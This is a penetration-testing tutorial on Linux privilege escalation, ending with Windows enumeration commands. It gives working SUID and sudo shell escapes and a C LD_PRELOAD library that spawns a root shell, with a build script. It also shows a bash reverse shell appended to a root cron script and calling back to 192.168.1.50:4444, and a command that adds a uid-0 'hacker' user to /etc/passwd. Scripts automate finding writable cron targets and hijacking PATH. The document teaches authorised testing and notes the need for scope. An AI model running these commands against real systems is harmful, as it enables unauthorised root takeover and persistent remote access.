Privilege escalation is the phase that follows initial access: having landed on a system, often as a low-privilege user, you elevate your permissions, typically to root on Linux or SYSTEM/Administrator on Windows. It is a critical pentest phase because it demonstrates the full impact of the initial compromise.
Authorisation: Privilege escalation should only be attempted on systems within your agreed scope. Document every step.
Before attempting any escalation, gather information:
# Current user and groups
whoami
id
groups
# System information
uname -a
cat /etc/os-release
hostname
# Other users
cat /etc/passwd
cat /etc/shadow # if readable — immediate win
# Running processes
ps aux
# Network connections
ss -tulnp
netstat -antp
# Installed packages (look for outdated software)
dpkg -l # Debian/Ubuntu
rpm -qa # RHEL/CentOS
SUID (Set User ID) binaries execute with the owner's privileges — often root:
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Common exploitable SUID binaries:
# /usr/bin/find (-quit stops after the first match, so you get one shell rather than one per file)
find . -exec /bin/bash -p \; -quit
# /usr/bin/vim (bash drops a borrowed effective uid unless started with -p, so a plain ':!bash' lands you back as your own user)
vim -c ':!bash -p'
# /usr/bin/python3
python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
# /usr/bin/nmap (old versions with interactive mode)
nmap --interactive
!sh
Resource: GTFOBins (gtfobins.github.io) lists Unix binaries that can be exploited for privilege escalation.
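As an added example (not code from the original lesson), the following bash script automates the SUID check above: it lists setuid files under a tree and flags those whose name appears on a short, constructed list of binaries that GTFOBins documents with a shell escape. The list, the function names and the reliance on GNU find and stat are assumptions of this example.

```shell
#!/usr/bin/env bash
# Added example: scan a filesystem tree for setuid binaries and flag the ones
# with a known GTFOBins escape. Assumes GNU find and stat (Linux).

# list_suid <root>: print "owner-uid path" for every regular file under <root>
# that has the setuid bit set (owner uid 0 means the binary runs as root).
list_suid() {
    find "$1" -perm -4000 -type f -exec stat -c '%u %n' {} + 2>/dev/null
}

# KNOWN_SUID_ESCAPES is a constructed subset of binaries that GTFOBins lists
# with a SUID shell escape; it is illustrative, not the full catalogue.
KNOWN_SUID_ESCAPES="bash sh dash find vim vi nmap python python2 python3 perl env less more cp mv awk gawk"

# flag_known_suid <root>: keep only the setuid binaries whose basename is in
# KNOWN_SUID_ESCAPES, sorted so the output is stable.
flag_known_suid() {
    local uid path name
    list_suid "$1" | while read -r uid path; do
        name=${path##*/}
        case " $KNOWN_SUID_ESCAPES " in
            *" $name "*) printf '%s %s\n' "$uid" "$path" ;;
        esac
    done | sort
}

# Against the live system:  flag_known_suid /
# Each hit is a candidate for the one-liners above; confirm the exact
# GTFOBins recipe for that binary before relying on it.
```

A hit only tells you the bit is set; the loader still refuses LD_PRELOAD and similar tricks on setuid binaries, and some distributions patch away the interactive modes, so always verify with `id` after the escape.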
# Check what you can run as sudo
sudo -l
# Example: user can run vim as root
# sudo vim -c ':!bash'
# Example: user can run find as root
# sudo find / -exec /bin/bash \; -quit
# Example: user can run any command as another user
# sudo -u admin /bin/bash
# LD_PRELOAD exploitation (if sudo -l shows env_keep += LD_PRELOAD)
# 1. Write a shared library whose constructor calls setgid(0)/setuid(0) and spawns a shell, then compile it with gcc -fPIC -shared
# 2. sudo LD_PRELOAD=/tmp/exploit.so <allowed_command>   (the loader runs your constructor as root before the command's main)
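To make step 1 concrete, here is an added example that is not part of the original lesson: a bash helper that writes and compiles the shared library. It assumes gcc, a glibc-based Linux target and a sudo rule that keeps LD_PRELOAD; the paths /tmp/exploit.c and /tmp/exploit.so follow the lesson's placeholder, and the function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example: build the LD_PRELOAD payload for a sudo rule that keeps the
# variable. Assumes gcc and a glibc loader (Linux).

# write_preload_source <path.c>: write a shared object whose constructor runs
# as soon as the loader maps it, i.e. before the allowed command's main().
write_preload_source() {
    cat > "$1" <<'EOF'
#include <stdlib.h>
#include <unistd.h>

/* Runs at load time. sudo has already switched to root (uid == euid == 0),
 * so the loader honours LD_PRELOAD. Drop the variable first so the shell we
 * spawn is not preloaded again, then hand over a root shell. If the setgid/
 * setuid calls fail we are not root (wrong rule, or preloaded by mistake):
 * return and let the real program run untouched. */
__attribute__((constructor))
static void preload_shell(void) {
    unsetenv("LD_PRELOAD");
    if (setgid(0) != 0 || setuid(0) != 0) {
        return;
    }
    execl("/bin/bash", "bash", "-p", (char *)NULL);
}
EOF
}

# build_preload <path.c> <path.so>: compile it as a position-independent
# shared object that the dynamic loader can preload.
build_preload() {
    gcc -fPIC -shared -o "$2" "$1"
}

# Usage on the target (needs "env_keep += LD_PRELOAD" in sudoers):
#   write_preload_source /tmp/exploit.c && build_preload /tmp/exploit.c /tmp/exploit.so
#   sudo LD_PRELOAD=/tmp/exploit.so /usr/bin/<allowed_command>
```

The allowed command must be dynamically linked for the loader to consult LD_PRELOAD at all, and without the env_keep entry sudo's default env_reset strips the variable before the command starts, which is why `sudo -l` is the check to run first.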
# Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
# Check for writable scripts called by cron
# If root's cron runs /opt/backup.sh and you can write to it:
echo '/bin/bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' >> /opt/backup.sh
# /dev/tcp is a bash feature: if the script's shebang is /bin/sh, append instead:
# bash -c 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1'
# then wait for the next run with a listener on your host: nc -lvnp 4444
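Checking the cron targets by hand is error-prone on a box with dozens of entries, so here is an added example (not from the original lesson) that parses a system-format crontab and prints the commands whose script, or whose parent directory, the current user can write. It handles /etc/crontab and /etc/cron.d files, which carry a user field; `crontab -l` output lacks that column and is not handled. The function name, the output format and the demo file layout are this example's assumptions.

```shell
#!/usr/bin/env bash
# Added example: find cron entries whose command you can tamper with.
# Assumes the system crontab layout: min hour dom mon dow user command...

# find_writable_cron_targets <crontab-file>
# Prints "user path reason" for every entry whose command is an absolute path
# that is writable, or that lives in a directory you can write (in which case
# the file can be replaced even if it is not itself writable).
find_writable_cron_targets() {
    local file="$1" line user target reason
    while IFS= read -r line || [ -n "$line" ]; do
        # skip blank lines, comments and VAR=value assignments
        case "$line" in ''|'#'*|[A-Za-z_]*=*) continue ;; esac
        set -f                 # no globbing: the '*' fields must survive word splitting
        # shellcheck disable=SC2086
        set -- $line
        set +f
        if [ "${1#@}" != "$1" ]; then   # @reboot / @daily form: user is field 2
            user="$2"; target="$3"
        else
            [ "$#" -ge 7 ] || continue  # malformed line
            user="$6"; target="$7"
        fi
        case "$target" in /*) ;; *) continue ;; esac   # only absolute paths are checkable
        if [ -w "$target" ]; then
            reason=writable
        elif [ -w "$(dirname "$target")" ]; then
            reason=parent-dir-writable
        else
            continue
        fi
        printf '%s %s %s\n' "$user" "$target" "$reason"
    done < "$file"
}

# On a target:  for f in /etc/crontab /etc/cron.d/*; do find_writable_cron_targets "$f"; done
```

Any line reported with user `root` is the situation described above: whatever you append to that script runs as root on the next schedule. A `parent-dir-writable` hit for a path that does not exist yet is just as good, since you can create the file cron is expecting.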
# Check kernel version
uname -r
# Search for exploits
searchsploit linux kernel <version>
# Popular kernel exploits:
# DirtyPipe (CVE-2022-0847): Linux 5.8 up to the fixes in 5.16.11, 5.15.25 and 5.10.102
# DirtyCow (CVE-2016-5195): Linux 2.6.22 to 4.8.3
# PwnKit (CVE-2021-4034): pkexec (polkit) on most Linux distros; not a kernel bug, but found the same way
# Kernel exploits can panic the host: test on a VM with the same kernel first and treat them as a last resort
# Files the current user can write (skip /proc, which is all pseudo-files)
find / -writable -type f -not -path "/proc/*" 2>/dev/null
# Strictly world-writable files
find / -perm -0002 -type f -not -path "/proc/*" 2>/dev/null
# Writable /etc/passwd (rare but critical)
# Add a new uid-0 user. Double quotes are required: inside single quotes the $(...) would be written literally instead of expanded.
echo "hacker:$(openssl passwd -1 password123):0:0::/root:/bin/bash" >> /etc/passwd
su hacker   # password123
# Writable /etc/shadow
# Generate a replacement hash and paste it into the second field of the root line
openssl passwd -6 password123
# Writable PATH directories
echo "$PATH"
# ls -la lists a directory's contents; -ld shows the permissions of the directory itself
echo "$PATH" | tr ':' '\n' | xargs ls -ld
# If a writable directory comes before /usr/bin, a binary you drop there shadows any command a privileged script calls by name
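For the PATH point above, this added example (not part of the original page) lists the writable directories in a PATH string and then shows the hijack itself: a stand-in `id` placed in a writable directory that is searched first runs instead of the real `id` whenever a script calls `id` by name, while a script that uses the absolute path is unaffected. The function names, the stand-in's message and the temp-directory demo are constructed for this example.

```shell
#!/usr/bin/env bash
# Added example: writable PATH entries and a visible PATH hijack.
# Assumes a POSIX sh and a temp directory that allows execution.

# writable_path_dirs [PATH-string]: print, in search order, each directory in
# the given PATH (default: the caller's $PATH) that the current user can write.
writable_path_dirs() {
    local path="${1:-$PATH}" dir
    local IFS=':'
    for dir in $path; do
        [ -n "$dir" ] || dir="."   # an empty PATH element means the current directory
        if [ -d "$dir" ] && [ -w "$dir" ]; then
            printf '%s\n' "$dir"
        fi
    done
}

# plant_hijack <dir> <name>: drop a stand-in <name> into <dir>. A real payload
# would spawn a shell or add a user; this one only announces that it ran, so
# the effect is visible and harmless.
plant_hijack() {
    local dir="$1" name="$2"
    printf '#!/bin/sh\necho "HIJACKED: %s ran from %s"\n' "$name" "$dir" > "$dir/$name"
    chmod 755 "$dir/$name"
}

# run_as_victim <hijack-dir> <command-line>: run a command line the way a cron
# job or sudo-able wrapper with an attacker-influenced PATH would, with
# <hijack-dir> searched first, and return its output.
run_as_victim() {
    PATH="$1:$PATH" sh -c "$2"
}

# Demo:
#   d=$(mktemp -d); plant_hijack "$d" id
#   run_as_victim "$d" 'id'            # the stand-in runs
#   run_as_victim "$d" '/usr/bin/id'   # absolute path: the real id runs
```

The fix on the defensive side is the mirror image of the attack: privileged scripts should set `PATH` explicitly at the top and call binaries by absolute path, and no directory on root's PATH should be writable by anyone else.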
:: Windows enumeration (cmd.exe): current user and privileges
whoami
whoami /priv
whoami /groups
net user %username%
:: System information
systeminfo
hostname
:: Other users and groups
net user
net localgroup administrators
:: Running services
sc query state= all
wmic service get name,displayname,pathname,startmode
:: Network information
ipconfig /all
netstat -ano